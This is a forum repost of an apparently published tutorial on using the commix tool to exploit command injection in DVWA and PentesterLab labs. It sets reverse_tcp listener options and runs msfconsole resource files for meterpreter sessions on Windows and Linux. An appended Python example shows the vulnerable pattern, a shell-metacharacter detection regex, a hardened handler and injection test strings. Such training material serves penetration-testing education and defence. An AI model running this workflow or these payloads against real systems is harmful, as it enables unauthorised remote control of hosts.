landon98
Commix is an automated command injection tool. It lets you have a meterpreter session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers in order to find vulnerabilities. In this article, we will learn how to get a meterpreter session using commix. For the detailed guide on commix click here.
Requirements :
- DVWA (for Windows 10)
- PentesterLab (for Linux testing)
- Kali Linux
- Commix
As you can see in the image below the environment of DVWA is vulnerable to command injection. Submit the local host request from DVWA.

Capture the previously submitted request through BurpSuite by simultaneously turning on the intercept as shown in the image below :

Once the cookies are captured, copy the whole cookie and paste it in a TXT file. Now, use the following command in order to exploit the command injection vulnerability in the DVWA environment :
Code:
commix -r /root/Desktop/req.txt
Here,
-r : refers to the path of the request file from which the HTTP request will be loaded.
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :

Now that you are in the pseudo terminal, type the following set of commands in order to generate a reverse shell :
Code:
reverse_tcp
set lhost 192.168.1.107
set lport 1234
After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want, as in whether you want it to be PHP, Windows, etc. As our DVWA is set up on Windows, we will select option 10. Then it will further ask you to choose a particular PowerShell injection. Choose 1 for now, as we will try other options too.

When everything is done, it will give a resource file with the execution command. Open a new terminal window and type the command there, as in our case it generated the following command :
Code:
msfconsole -r /usr/share/commix/powershell_attack.rc

As the above command is executed, you will directly have your meterpreter session as shown in the image above.
Now, repeat the above steps as they are, but instead of choosing option 1 of PowerShell injection, choose 2 this time, as it will help us get a meterpreter session through magic unicorn. After choosing option 2, it will again generate a resource file that is to be executed in the new terminal window. In our case the following command was generated :
Code:
msfconsole -r /usr/share/magic-unicorn/unicorn.rc

Again, when the command is executing you will have your meterpreter session as shown in the image below :

All the above meterpreter sessions were taken using option 10 under the category of the meterpreter reverse shell. But this time we will use option 11, which is web delivery, to have a meterpreter session. So, repeat the same steps as above, but this time choose option 11 when asked which meterpreter reverse shell you want.

Then once you have chosen option 11, it will ask whether you want a web delivery script for PHP, Python or Windows. Now, as we are attacking Windows, select option 3.

Once again, it will give you a resource file and a command that is to be run in the new terminal window. In our case, the following command was generated :
Code:
msfconsole -r /usr/share/commix/web_delivery.rc
As the command is executed, you will have your meterpreter session as shown in the image below :

Until now, all the meterpreter sessions we took were in the Windows environment. Now, we will gain a meterpreter session in a Linux environment. For this, we will use PentesterLab.

Just like we did for Windows, capture the cookies of PentesterLab in Burp Suite as shown in the image below :

Copy the contents of the cookies in a TXT file and use the following command to attack :
Code:
commix -r /root/Desktop/1.txt
As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :

Now that you are in the pseudo terminal, type the following set of commands in order to generate a reverse shell :
Code:
reverse_tcp
set lhost 192.168.1.107
set lport 1234
After executing the above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. So, press 2 for the meterpreter one. Then it will ask you which meterpreter session you want, as in whether you want it to be PHP, Windows, etc. As we are now testing on Linux, we will select option 8, i.e. a PHP meterpreter reverse shell.

Just like before, this too will generate a resource file which you have to execute in a new terminal window. In our case, the command generated was :
Code:
msfconsole -r /usr/share/commix/php_meterpreter.rc
As the above command is executed, you will have your session as shown in the image below :

The other method we will use to exploit Linux is by using web delivery. Repeat the above steps similarly, but instead of choosing option 8, this time choose option 11 for web delivery. And then choose option 2 for a PHP reverse shell.

Executing the above steps will create a resource file yet again. Run the command given in the new terminal window :
Code:
msfconsole -r /usr/share/commix/web_delivery.rc

Running the above command will give you your session as shown in the above image. This is how you can gain a meterpreter session through a command injection vulnerability using commix. The session can be acquired on both Windows and Linux platforms.
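Every session above starts from one flaw: the application places request input into a shell command line. The following is an added example, not part of the original article or of DVWA or commix, showing that pattern beside a hardened handler for a ping-style form; the function names, the metacharacter list and the sample inputs are assumptions constructed for illustration.

```python
import ipaddress
import re
import subprocess

# Characters that chain, pipe or substitute commands in common shells
# (constructed list for this example; used for alerting, not as the defence).
SHELL_META = re.compile(r"[;&|`$<>()\r\n]")

def vulnerable_command(target):
    """The flawed pattern: input concatenated into a string later run by a shell."""
    return "ping -c 1 " + target

def looks_like_injection(target):
    """Detection signal worth logging when validation rejects a value."""
    return bool(SHELL_META.search(target))

def safe_ping_argv(target):
    """Allow only a literal IP address and return an argv list (no shell involved)."""
    target = target.strip()
    if "%" in target:
        # IPv6 zone IDs are free-form text, so refuse them outright.
        raise ValueError("zone IDs not accepted")
    addr = ipaddress.ip_address(target)  # raises ValueError for anything else
    return ["ping", "-c", "1", str(addr)]  # '-c' is the Linux flag; Windows uses '-n'

def handle(target):
    """Hypothetical request handler: validate first, flag suspicious rejects."""
    try:
        argv = safe_ping_argv(target)
    except ValueError:
        return {"ok": False, "alert": looks_like_injection(target), "argv": None}
    return {"ok": True, "alert": False, "argv": argv}

def run(argv):
    """Execute the validated argv directly; shell=False means no metacharacter parsing."""
    return subprocess.run(argv, capture_output=True, text=True, timeout=5, shell=False)

# Constructed sample inputs: one legitimate value and three that must be rejected.
SAMPLES = ["127.0.0.1", "127.0.0.1; whoami", "localhost", "fe80::1%;whoami"]

if __name__ == "__main__":
    for value in SAMPLES:
        print(repr(value), "->", handle(value))
```

Rejected values that also raise the alert flag are the ones worth sending to the web server's security log, since ordinary typos such as a hostname do not contain shell metacharacters.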
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here